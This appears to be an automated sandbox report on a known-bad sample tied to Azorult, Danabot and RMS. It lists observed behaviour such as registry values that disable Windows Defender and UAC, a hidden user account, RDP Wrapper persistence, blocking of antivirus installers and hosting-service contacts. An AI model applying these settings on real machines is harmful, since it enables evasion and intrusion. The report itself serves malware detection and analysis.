Analysis Overview
SHA256
a48de509cda096a6b13c6f51d7312ecdb42418610ef1e86631e638ce90ec7cda
Threat Level: Known bad
The file 20250322_162339.webp was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Windows security bypass
Azorult family
Danabot
Azorult
Modifies visibility of hidden/system files in Explorer
Danabot family
RMS
Modifies Windows Defender Real-time Protection settings
Danabot x86 payload
Rms family
Remote Service Session Hijacking: RDP Hijacking
Grants admin privileges
Downloads MZ/PE file
Sets file to hidden
Drops file in Drivers directory
Server Software Component: Terminal Services DLL
Modifies Windows Firewall
Blocklisted process makes network request
Stops running service(s)
Blocks application from running via registry modification
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Password Policy Discovery
Command and Scripting Interpreter: PowerShell
Adds Run key to start application
Modifies WinLogon
Looks up external IP address via web service
UPX packed file
Drops file in System32 directory
AutoIT Executable
Hide Artifacts: Hidden Users
Launches sc.exe
Drops file in Program Files directory
Permission Groups Discovery: Local Groups
Program crash
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
Browser Information Discovery
System Location Discovery: System Language Discovery
Suspicious behavior: LoadsDriver
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies data under HKEY_USERS
Gathers network information
Delays execution with timeout.exe
Kills process with taskkill
Suspicious behavior: SetClipboardViewer
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Runs .reg file with regedit
Opens file in notepad (likely ransom note)
System policy modification
Checks processor information in registry
Runs net.exe
Modifies registry class
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-05-19 10:22
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-19 10:22
Reported
2025-05-19 10:30
Platform
win10v2004-20250502-en
Max time kernel
413s
Max time network
409s
Command Line
Signatures
Azorult
Azorult family
Danabot
Danabot family
Danabot x86 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies visibility of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
RMS
Rms family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\regedit.exe | N/A |
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Blocklisted process makes network request
Blocks application from running via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Modifies Windows Firewall
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" | C:\rdp\RDPWInst.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlog.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\winlogon.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\taskhost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\install\cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\programdata\microsoft\intel\R8.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-186956858-2143653872-2609589082-1000\Control Panel\International\Geo\Nation | C:\ProgramData\Microsoft\Intel\wini.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Modifies file permissions
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" | C:\Programdata\RealtekHD\taskhostw.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\rdp\RDPWInst.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
Password Policy Discovery
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\System32\rfxvmt.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\john = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\automation.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_etld1_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\smart_switch_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\COMODO | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\McAfee | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\AVAST Software | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\Cezurity | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Enigma Software Group | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\GRIZZLY Antivirus | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-kayak.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\crl-set | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\keys.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\nav_config.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\rdp\RDPWInst.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\ESET | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft JDX | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\ByteFence | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Panda Security | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\extraction.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\typosquatting_list.pb | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Zaxar | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1383799245\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\360 | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File opened for modification | C:\Program Files\SpyHunter | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_24898505\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1764881355\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\Common Files\System\iediagcmd.exe | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\office_endpoints_list.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1616464308\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kaspersky Lab | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_933065173\deny_full_domains.list | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_976953327\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Program Files\AVG | C:\Users\Admin\Downloads\Azorult.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\classification.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_84579926\travel-facilitated-booking-bing.js | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1559524024\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_1715725482\protocols.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\chrome_Unpacker_BeginUnzipping4936_2031229069\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\rdp\RDPWInst.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
